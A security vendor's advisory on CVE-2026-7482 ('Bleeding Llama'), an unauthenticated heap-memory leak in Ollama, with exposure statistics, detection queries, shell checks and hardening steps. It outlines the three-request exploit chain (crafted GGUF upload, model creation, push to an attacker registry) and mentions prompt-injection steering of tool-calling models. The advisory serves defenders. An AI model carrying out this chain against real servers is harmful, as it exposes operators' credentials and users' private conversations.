Bleeding Llama — CVE-2026-7482: When 300,000 AI Servers Become Targets

Risk Summary

CVE-2026-7482 (CVSS 9.1, Critical) allows an unauthenticated attacker to read heap memory from a running Ollama process. With just three API calls, sensitive data resident in that memory, such as cloud API keys, organizational system prompts, and user conversation history, can be exfiltrated to an attacker-controlled server.

Ollama has over 170,000 GitHub stars and more than 100 million Docker Hub pulls, and is widely deployed as a self-hosted AI inference engine in enterprise environments and by individual developers. What makes this vulnerability particularly dangerous: the Ollama API has no authentication. A native install listens on 127.0.0.1:11434 by default, but the official Docker image is configured to listen on all interfaces (0.0.0.0:11434), and many operators set OLLAMA_HOST=0.0.0.0 to share a server. On any such host, anyone who can reach port 11434 can exploit the flaw immediately.

Research by SentinelLABS and Censys identified over 175,000 publicly exposed Ollama hosts across 130 countries. Cyera Research — the team that discovered the vulnerability — estimates approximately 300,000 servers were affected at the time of disclosure.

Immediate action required: Upgrade Ollama to version 0.17.1 or later, and block port 11434 from the public internet using firewall rules or network policies.


Technical Background

Attribute | Details
CVE ID | CVE-2026-7482
CVSS Score | 9.1 (Critical)
CWE | CWE-125 (Out-of-Bounds Read)
Affected Product | Ollama, all versions prior to 0.17.1
Attack Vector | Network, unauthenticated, no user interaction
Discovered By | Cyera Research
Disclosed | May 2026
Patch | Ollama v0.17.1

Ollama uses the GGUF (GGML Unified Format) to store and load model weights. When a user uploads a GGUF file and requests Ollama to create a model from it, the engine reads tensor data from memory based on declarations in the file header — this is the root cause of the vulnerability.
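The fixed part of a GGUF header can be inspected with standard tools, which makes it easier to see what the engine is trusting. The sketch below reads the first 24 bytes: per the GGUF specification (v2 and later), a 4-byte "GGUF" magic, a uint32 version, then uint64 tensor and metadata key/value counts, all little-endian. It assumes a little-endian host (od prints in host byte order) and an od that supports 8-byte integers, as GNU coreutils does. The per-tensor shape declarations that matter for this CVE follow the metadata section and are not parsed here; the function name gguf_header is illustrative.

```shell
#!/bin/sh
# Sketch: print the fixed-size GGUF header fields.
# Layout (GGUF v2+): 4-byte magic "GGUF", uint32 version, uint64 tensor count,
# uint64 metadata key/value count, all little-endian.
# ASSUMPTIONS: little-endian host (od prints in host byte order) and an od
# that supports 8-byte integers via -t u8 (GNU coreutils od does).
gguf_header() {
  local file=$1
  local magic version tensors kvs
  magic=$(head -c 4 "$file")
  if [ "$magic" != "GGUF" ]; then
    echo "not a GGUF file: $file" >&2
    return 1
  fi
  version=$(od -An -tu4 -j4 -N4 "$file" | tr -d ' ')   # bytes 4-7
  tensors=$(od -An -tu8 -j8 -N8 "$file" | tr -d ' ')   # bytes 8-15
  kvs=$(od -An -tu8 -j16 -N8 "$file" | tr -d ' ')      # bytes 16-23
  echo "version=$version tensors=$tensors metadata_kvs=$kvs"
}
```

Running gguf_header model.gguf prints a single line of the form version=N tensors=N metadata_kvs=N, and rejects files without the GGUF magic.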


Exploitation Mechanism

Root Cause: Out-of-Bounds Heap Read in GGUF Pipeline

The vulnerability resides in Ollama's model quantization pipeline. When processing a GGUF file, Ollama fully trusts the tensor shape values declared in the file header and reads exactly that many bytes from the memory buffer. A specially crafted GGUF file can declare a tensor size far larger than the actual data provided, causing Ollama to read beyond the intended buffer boundary — accessing adjacent heap memory containing sensitive process data.

That heap data is then embedded into the resulting model file. The attacker then leverages Ollama's built-in model push feature to send the file — along with all stolen heap data — to an attacker-controlled server.
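The missing check is simple to state: the bytes implied by a tensor's declared shape must not exceed the bytes actually present. The function below is a hypothetical illustration of that validation, not Ollama's code (Ollama itself is written in Go). It handles only fixed-width element types such as F32 (4 bytes) or F16 (2 bytes); block-quantized types like Q4_K_M would need per-block size arithmetic instead.

```shell
#!/bin/sh
# Hypothetical bounds check (not Ollama's code): does a tensor's declared shape
# fit inside the bytes actually supplied for it?
# Usage: tensor_fits ELEM_SIZE AVAILABLE_BYTES DIM [DIM...]
# ASSUMPTION: fixed-width element types only (e.g. F32 = 4 bytes, F16 = 2).
tensor_fits() {
  local elem_size=$1 available=$2
  shift 2
  local max=$((1 << 62))   # ceiling safely below the signed 64-bit limit
  local needed=$elem_size
  local dim
  for dim in "$@"; do
    # Reject empty, non-numeric, zero/leading-zero and over-long dimensions
    case $dim in ''|*[!0-9]*|0*) return 1 ;; esac
    [ "${#dim}" -le 18 ] || return 1
    # Overflow guard: needed * dim must stay <= max
    [ "$needed" -le $((max / dim)) ] || return 1
    needed=$((needed * dim))
  done
  # The declared size must not exceed the data really present
  [ "$needed" -le "$available" ]
}
```

For example, tensor_fits 4 1024 4096 4096 fails: a 4096 × 4096 F32 tensor needs 4 × 4096 × 4096 = 67,108,864 bytes, far more than the 1,024 supplied. The overflow guard matters because the attacker controls every dimension, and an unchecked product could wrap around to a small number that passes the size comparison.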

Attack Flow: 3 API Calls, 0 Credentials

Step 1: Upload malicious GGUF file
POST /api/blobs/sha256:<hash>
Content: GGUF file with inflated tensor shape
→ Ollama stores the file in blob storage
 
Step 2: Trigger model creation (triggers out-of-bounds read)
POST /api/create
Body: {"name": "attacker-model", "modelfile": "FROM sha256:<hash>"}
→ Pipeline reads beyond buffer boundary; heap data is embedded into model file
 
Step 3: Exfiltrate model (containing heap data) externally
POST /api/push
Body: {"name": "attacker-registry/attacker-model"}
→ Entire model file — including stolen heap data — is pushed to attacker's server

The entire process requires no credentials, no user interaction, and can be executed remotely over the internet against any Ollama instance listening on a public interface.
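Because each of the three calls is an ordinary HTTP request, the chain can leave traces in Ollama's server log. A minimal triage sketch, assuming the log contains Gin framework access lines like the example in the comment (verify the layout against your own logs before relying on it): it reads log text on stdin and prints the client IP and path of every POST to /api/blobs, /api/create or /api/push that did not come from loopback. The function name is hypothetical.

```shell
#!/bin/sh
# Sketch: flag POST requests to /api/blobs, /api/create and /api/push from
# non-loopback clients, reading Ollama server log text on stdin.
# ASSUMPTION: request lines use the Gin access-log layout, for example:
#   [GIN] 2026/05/10 - 10:23:45 | 200 |  1.2ms |  203.0.113.7 | POST     "/api/push"
# Fields split on "|": $4 is the client IP, $5 the method and quoted path.
flag_model_api_calls() {
  awk -F'|' '
    $5 ~ /POST +"\/api\/(blobs|create|push)/ {
      ip = $4
      gsub(/ /, "", ip)                              # trim padding
      if (ip == "127.0.0.1" || ip == "::1") next     # ignore local callers
      path = $5
      sub(/^[^"]*"/, "", path)                       # drop method and opening quote
      sub(/".*$/, "", path)                          # drop closing quote
      print ip, path
    }'
}
```

On a systemd host this could run as journalctl -u ollama --no-pager | flag_model_api_calls | sort | uniq -c. A blob upload, create, and push from the same external IP within a short window matches the Bleeding Llama sequence.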


Attack Surface: 175,000 Hosts, 130 Countries

Figure: Top 10 countries by share of unique Ollama hosts (source: SentinelLABS + Censys, "Silent Brothers" research, 01/2026)

A joint research project between SentinelLABS and Censys, spanning 293 days, recorded 7.23 million observations across 175,108 unique Ollama hosts in 130 countries and 4,032 ASNs. These are not theoretical statistics — this is attack surface that is reachable right now.

The ecosystem has a bimodal structure: a large layer of transient hosts overlays a smaller but persistent backbone that accounts for 76% of all observations. This backbone is where the most valuable targets reside: endpoints that run continuously and deliver real utility to their operators.

Infrastructure breakdown:

  • 56% of hosts sit on fixed-access telecom/residential networks (consumer ISPs)

  • 32% on hyperscalers (AWS, GCP, Azure)

  • 19% of ASN classifications returned null values — ownership cannot be determined

Capability Surface: Beyond Text Generation

Figure: Host capability coverage (tool calling, vision, thinking models) as a share of all hosts (source: SentinelLABS)

Exposure is only part of the picture; many of these hosts offer capabilities well beyond text generation:

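  • 48% of hosts serve models with tool-calling capability; Ollama returns tool calls to the client rather than running them, but any application that wires those calls to code execution, external APIs, or file systems lets the model drive those actions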

  • 38% are configured with [completion, tools] — wired to interface with external software

  • 26% run "thinking" models (chain-of-thought, multi-step reasoning)

  • 22% support vision, creating vectors for indirect prompt injection via images or documents

  • 201 hosts are actively running "uncensored" system prompt templates that explicitly remove safety guardrails

Monoculture Risk

Figure: Top 20 model families by share of unique Ollama hosts (source: SentinelLABS, model adoption distribution)

While host placement is decentralized, model adoption is highly concentrated. Llama (#1), Qwen2 (#2), and Gemma2 (#3) held the same top-3 positions with zero rank volatility across the entire 293-day scan period. The Q4_K_M quantization format appears on 48% of hosts — a vulnerability in how this specific format is processed could simultaneously affect nearly half the entire deployed ecosystem.


What Attackers Can Steal

The data recovered from heap memory is not random — it is operational data from the active Ollama process:

From active AI sessions:

  • User prompts and chat messages from all connected users

  • System prompts of all running models (often containing sensitive business logic, persona definitions, or internal tooling instructions)

  • Cross-session conversation history

From the host environment:

  • Environment variables — including API keys for OpenAI, Anthropic, AWS, and database credentials

  • Source code submitted to the AI for review or debugging

  • Customer data, contracts, and internal documents pasted into AI sessions

Highest-risk target: enterprises using Ollama as a shared internal AI assistant, where a single successful exploitation can yield interactions from the entire organization's workforce.
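Environment variables are the most directly reusable item on this list, so scoping credential rotation starts with knowing which secrets a given Ollama process actually holds. A minimal sketch, assuming Linux /proc and conventional secret naming: it reads a NUL-separated environ stream on stdin and prints only variable names, so the check itself never displays a secret. The function name and name patterns are illustrative.

```shell
#!/bin/sh
# Sketch: list the NAMES (never the values) of secret-looking environment
# variables from a NUL-separated environ stream on stdin, e.g. /proc/PID/environ.
# ASSUMPTION: secrets follow common naming (*KEY, *TOKEN, *SECRET, *PASSWORD).
# Connection strings such as DATABASE_URL can embed credentials and need a manual look.
secret_env_names() {
  # One variable per line, keep only the name part, then match secret-like names.
  # "|| true" keeps "no secrets found" from looking like a failure.
  tr '\000' '\n' | cut -d= -f1 | grep -Ei 'key|token|secret|passw|credential' || true
}
```

On a Linux host: sudo cat "/proc/$(pgrep -x ollama | head -n 1)/environ" | secret_env_names. If the host was reachable on port 11434 before patching, every name printed belongs on the rotation list.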


MITRE ATT&CK Mapping

Tactic | Technique | Description
Initial Access | T1190: Exploit Public-Facing Application | Exploiting the unauthenticated Ollama API endpoint
Credential Access | T1552: Unsecured Credentials | Reading environment-variable secrets from leaked heap memory
Collection | T1005: Data from Local System | Collecting conversation history and system prompts from process memory
Exfiltration | T1041: Exfiltration Over C2 Channel | Pushing the model (containing stolen heap data) to an attacker-controlled registry
Execution (tool-calling abuse) | T1059: Command and Scripting Interpreter | Steering an application that executes tool calls returned by an exposed Ollama model

Detection & Response

No specific file hashes or attacker IPs have been published at the time of writing. However, behavior-based detection is fully viable:

KQL — Microsoft Sentinel (detecting push to external registry):

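// Query 1: Ollama connecting to public IPs (possible model push to an external registry)
// Legitimate `ollama pull` traffic to the official registry also matches; baseline first.
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("ollama", "ollama.exe")
| where RemotePort in (443, 80, 11434)
| where RemoteIPType == "Public"   // excludes private/loopback ranges; string prefixes missed 172.17-172.31
| where ActionType == "ConnectionSuccess"
| summarize ConnectionCount = count(), RemoteIPs = make_set(RemoteIP) by DeviceName, bin(Timestamp, 1h)
| where ConnectionCount > 5
| project Timestamp, DeviceName, RemoteIPs, ConnectionCount

// Query 2: bursts of inbound connections to the Ollama API from non-loopback clients
// (network telemetry cannot see the URL path, so this flags volume, not /api/blobs specifically)
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("ollama", "ollama.exe")
| where LocalPort == 11434   // inbound: 11434 is the local listening port, not the remote one
| where ActionType == "InboundConnectionAccepted"
| where RemoteIPType != "Loopback"
| summarize InboundCount = count() by DeviceName, bin(Timestamp, 10m)
| where InboundCount > 10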
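Hosts without Defender telemetry can approximate the first query locally. The sketch below parses ss -tnp output and prints public IPv4 peers of established connections owned by a process named ollama; that covers both outbound connections (pulls and pushes) and inbound clients. It assumes ss runs as root so process names are visible, skips IPv6 for brevity, and uses a hypothetical function name.

```shell
#!/bin/sh
# Sketch: print public IPv4 peers of established TCP connections owned by a
# process named "ollama", reading "ss -tnp" output on stdin.
# ASSUMPTIONS: ss runs as root (otherwise the process column is empty) and only
# IPv4 peers matter; IPv6 peers are skipped in this illustration.
ollama_public_peers() {
  awk '
    $1 == "ESTAB" && /users:\(\("ollama"/ {
      peer = $5
      sub(/:[0-9]+$/, "", peer)                      # strip the port
      if (peer !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) next
      split(peer, o, ".")
      a = o[1] + 0; b = o[2] + 0                     # force numeric comparison
      if (a == 10 || a == 127) next                  # 10/8 and loopback
      if (a == 172 && b >= 16 && b <= 31) next       # 172.16/12
      if (a == 192 && b == 168) next                 # 192.168/16
      print peer
    }' | sort -u
}
```

Usage: sudo ss -tnp | ollama_public_peers. Any address that is neither a registry you pull from nor an expected client deserves a closer look.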

Quick Exposure Check:

# Check which address Ollama is listening on (run as root so -p can show the process)
sudo ss -tlnp | grep 11434

# 0.0.0.0:11434, *:11434, [::]:11434 or a LAN address → reachable from the network, action needed
# 127.0.0.1:11434 → localhost only, not reachable remotely

# Check current version
ollama --version

# Test external accessibility (from another host on the network)
curl -s http://<ollama-host>:11434/api/tags | jq .
# If it returns a model list without an auth prompt → needs immediate remediation
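The listening-address check can be scripted so it gives the same verdict on every host. A minimal sketch with a hypothetical function name: it reads ss -tln output on stdin and reports "exposed" for any non-loopback bind on port 11434, "local" for loopback only, and "not-listening" otherwise.

```shell
#!/bin/sh
# Sketch: classify how Ollama's port is bound, reading "ss -tln" output on stdin.
# Column 4 of each LISTEN line is the local address:port.
# Prints "exposed" (any non-loopback address), "local" (loopback only)
# or "not-listening".
ollama_bind_status() {
  awk '
    $4 ~ /:11434$/ {
      found = 1
      if ($4 != "127.0.0.1:11434" && $4 != "[::1]:11434") exposed = 1
    }
    END { print (exposed ? "exposed" : (found ? "local" : "not-listening")) }'
}
```

Run locally as ss -tln | ollama_bind_status, or across an inventory with ssh "$host" ss -tln | ollama_bind_status. A listening-socket check cannot see every path in (container port-forwarding rules, for example), so the external curl test remains the deciding check.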

Expert Analysis

CVE-2026-7482 draws a direct parallel to Heartbleed (CVE-2014-0160): same vulnerability class (out-of-bounds heap read), same outcome (secret exfiltration from a running process's memory). Heartbleed exploited a buffer over-read in OpenSSL's heartbeat extension to read up to 64 KB of memory per request. Bleeding Llama uses inflated tensor shapes in the GGUF pipeline to read adjacent heap memory, with the declared shape controlling how far the read extends. Same pattern, different target: this time it's AI infrastructure.

The more concerning difference is monitoring coverage. In 2014, OpenSSL ran on infrastructure that already had security tooling, network monitoring, and patch management processes. Ollama in 2026 is different — the majority of deployments originate from developer or AI team initiatives, without security review, without EDR coverage on the Ollama process, and without anyone thinking to add firewall rules to a tool perceived as "internal only."

From a SOC perspective, three points stand out for organizations running Ollama:

Ollama is frequently deployed in dev/test environments without clear network segmentation — the AI server sitting on the same VLAN as production workloads or authentication infrastructure. Once Ollama is exploited and environment variables are dumped, lateral movement to the rest of the environment is a natural next step.

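The tool-calling capability present on 48% of exposed hosts creates a secondary attack vector independent of the memory leak. Ollama itself does not execute tools: it returns tool-call requests to the client application, which runs them. Where an application wires those calls to shells, APIs, or file systems and feeds the model untrusted input (a document, an image for a vision model, a prompt relayed from an exposed endpoint), an attacker who can steer the prompt can steer the actions. This is LLM-as-execution-proxy: no memory-corruption exploit required.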

The monoculture is a systemic risk. When Q4_K_M appears on 48% of hosts and Llama holds a stable #1 position, the next vulnerability in this format or model family will have a blast radius covering nearly half the entire deployed ecosystem — not isolated incidents, but sector-wide simultaneous impact.

CVSS 9.1 accurately reflects the technical severity. The business risk is even higher in environments using Ollama as a shared AI assistant — the entire organization's interaction history, system prompts containing business logic, and API keys for downstream services are all within reach of an attacker executing exactly three HTTP requests.


Recommendations

Immediate (0–24h)

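# 1. Patch: upgrade Ollama to v0.17.1+
# Linux (native install): re-run the official install script
curl -fsSL https://ollama.com/install.sh | sh

# Docker: pull the patched image, then recreate the container
docker pull ollama/ollama:latest

# macOS/Windows: update through the desktop app or reinstall from ollama.com

# Verify version after update
ollama --version  # must be 0.17.1 or higher

# 2. Block port 11434 at the firewall if immediate patching is not possible
# Linux (iptables): -I inserts at the top of INPUT, so add DROP first;
# the resulting order is ACCEPT loopback, then DROP everything else.
iptables -I INPUT -p tcp --dport 11434 -j DROP
iptables -I INPUT -i lo -p tcp --dport 11434 -j ACCEPT
# Repeat with ip6tables for IPv6. Ports published by Docker bypass INPUT,
# so filter those in the DOCKER-USER chain. Rules do not survive a reboot
# unless saved with your distribution's tooling.

# Windows Firewall (PowerShell; the backtick continues the line)
netsh advfirewall firewall add rule name="Block Ollama External" `
  dir=in action=block protocol=TCP localport=11434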
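Alongside firewall rules, pinning Ollama to loopback removes the network exposure at its source; OLLAMA_HOST is the environment variable Ollama reads for its bind address. A minimal sketch for systemd-managed installs, assuming the unit is named ollama.service as the Linux install script creates it; the function name and the drop-in file name bind.conf are hypothetical.

```shell
#!/bin/sh
# Sketch: render a systemd drop-in that pins Ollama's bind address.
# ASSUMPTION: Ollama runs as the systemd unit "ollama.service".
# Defaults to loopback; pass another address only if it is firewalled.
render_ollama_bind_override() {
  local addr=${1:-127.0.0.1:11434}
  printf '[Service]\nEnvironment="OLLAMA_HOST=%s"\n' "$addr"
}

# Apply (as root):
#   mkdir -p /etc/systemd/system/ollama.service.d
#   render_ollama_bind_override > /etc/systemd/system/ollama.service.d/bind.conf
#   systemctl daemon-reload && systemctl restart ollama
```

For Docker deployments the equivalent is publishing the port on loopback only, e.g. docker run -p 127.0.0.1:11434:11434 ollama/ollama.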

If Ollama needs to be accessible from the internal network (not just localhost), a reverse proxy with authentication is mandatory (nginx + basic auth or OAuth2 proxy) before any exposure — even on internal networks.
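A minimal sketch of such a proxy, assuming nginx with HTTP basic auth in front of an Ollama instance bound to 127.0.0.1:11434. The function renders a server block to stdout; the server name, certificate paths, and htpasswd path are placeholders, and denying /api/blobs, /api/create and /api/push at the proxy is an illustrative hardening choice aimed at this attack chain, not an Ollama requirement. Rewriting the Host header to localhost:11434 is a common pattern when proxying Ollama.

```shell
#!/bin/sh
# Sketch: emit an nginx server block that puts basic auth in front of Ollama.
# ASSUMPTIONS: Ollama listens on 127.0.0.1:11434, the htpasswd file already
# exists (e.g. created with "htpasswd -c FILE USER"), cert paths are placeholders.
render_ollama_proxy_conf() {
  local server_name=$1 htpasswd_file=$2
  cat <<EOF
server {
    listen 443 ssl;
    server_name ${server_name};
    ssl_certificate     /etc/ssl/certs/${server_name}.crt;
    ssl_certificate_key /etc/ssl/private/${server_name}.key;

    auth_basic           "Ollama";
    auth_basic_user_file ${htpasswd_file};

    # Refuse the model-management calls used in the Bleeding Llama chain
    location ~ ^/api/(blobs|create|push) {
        return 403;
    }

    location / {
        proxy_pass http://127.0.0.1:11434;
        proxy_set_header Host localhost:11434;
        proxy_read_timeout 300s;
    }
}
EOF
}
```

Usage: render_ollama_proxy_conf ai.example.internal /etc/nginx/ollama.htpasswd | sudo tee /etc/nginx/conf.d/ollama.conf, then sudo nginx -t && sudo systemctl reload nginx. Blocking those endpoints also stops legitimate remote model creation; teams that need it can restrict them to an admin allowlist instead.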

Short-term (1–7 days)

  • Audit all Ollama deployments: run ss -tlnp | grep 11434 on every host in inventory and identify hosts listening on anything other than loopback (0.0.0.0, *, [::], or a LAN address)

  • Implement network policies blocking outbound connections from the Ollama process to external IPs, allowing only the model registries you actually pull from (prevents exfiltration via /api/push)

  • Enable API access logging for Ollama: monitor POST /api/push, POST /api/blobs, POST /api/create from non-whitelisted IPs

  • Rotate all API keys, tokens, and secrets that were ever present in environment variables on any exposed Ollama host

Long-term

  • Include Ollama in Asset Management and Vulnerability Management scope — most teams currently treat it as a "developer tool" outside IT security governance

  • Consider deploying an AI Gateway layer (LiteLLM, Open WebUI with auth enabled) rather than exposing the Ollama API directly

  • Establish clear network segmentation: AI inference servers should not share a VLAN with production workloads or authentication infrastructure


References

  1. Cyera Research — Bleeding Llama Advisory

  2. Cyera Blog — Bleeding Llama Deep Dive

  3. The Hacker News — CVE-2026-7482 Coverage

  4. SentinelLABS — Silent Brothers Research

  5. The Hacker News — 175K Exposed Ollama Servers

  6. CVE Record — CVE-2026-7482

  7. Ollama Release Notes v0.17.1

FPT IS Security

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.